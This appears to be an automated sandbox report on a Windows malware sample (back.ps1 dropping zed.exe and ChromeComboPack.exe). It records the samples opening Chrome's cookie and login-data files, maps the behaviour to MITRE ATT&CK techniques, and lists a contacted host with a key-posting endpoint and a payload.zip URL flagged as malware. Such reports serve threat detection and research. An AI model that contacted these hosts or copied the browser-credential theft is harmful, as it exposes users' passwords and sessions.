Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\opt0.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\tzdata\Africa VolumeInformation	Jump to behavior

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E530D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00007FF7E530D010

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E5325C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

6_2_00007FF7E5325C00

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\gogjothegoat\payload			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\gogjothegoat\payload			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 File and Directory Discovery	Remote Desktop Protocol	11 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 Timestomp	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
back.ps1	0%	ReversingLabs
back.ps1	3%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
https://usjjsjsj.com.ng/post_fenec_key_user.php?	0%	Avira URL Cloud	safe
http://ocsp.accv.ests:	0%	Avira URL Cloud	safe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=	0%	Avira URL Cloud	safe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000	0%	Avira URL Cloud	safe
https://usjjsjsj.com.ng/execute/payload.zip	100%	Avira URL Cloud	malware
https://.VisualC	0%	Avira URL Cloud	safe
https://linuxreviews.org/HOWTO_change_the_mouse_speed_	0%	Avira URL Cloud	safe
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000p	0%	Avira URL Cloud	safe
http://www.microsoft.coK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
usjjsjsj.com.ng	142.132.252.48	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://usjjsjsj.com.ng/execute/payload.zip	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/issues/8996	zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	false		high
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages	zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 0000000A.00000002.3075122060.000002B03D2E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://usjjsjsj.com.ng/post_fenec_key_user.php?	zed.exe, 0000000C.00000002.4745134537.00000132F9FD8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mhammond/pywin32	ChromeComboPack.exe	false		high
http://www.microsoft.co	powershell.exe, 0000000A.00000002.3080499160.000002B0571AD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/	zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/core-metadata/	zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/openssl/openssl/blob/master/include/openssl/pem.h	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/packaging	zed.exe, 0000000C.00000002.4736377596.00000132F86E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://refspecs.linuxfoundation.org/elf/gabi4	zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=	zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crlO	zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.ietf.org/rfc/rfb	zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc3610	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crlW	zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/platformdirs/platformdirs	zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl	zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curl.haxx.se/rfc/cookie_spec.html	zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.accv.es	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000	zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.4741697049.000001EE16D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3075589371.000002B03F11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3166041238.0000025B4B651000.00000004.00000800.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;	zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp	false		high
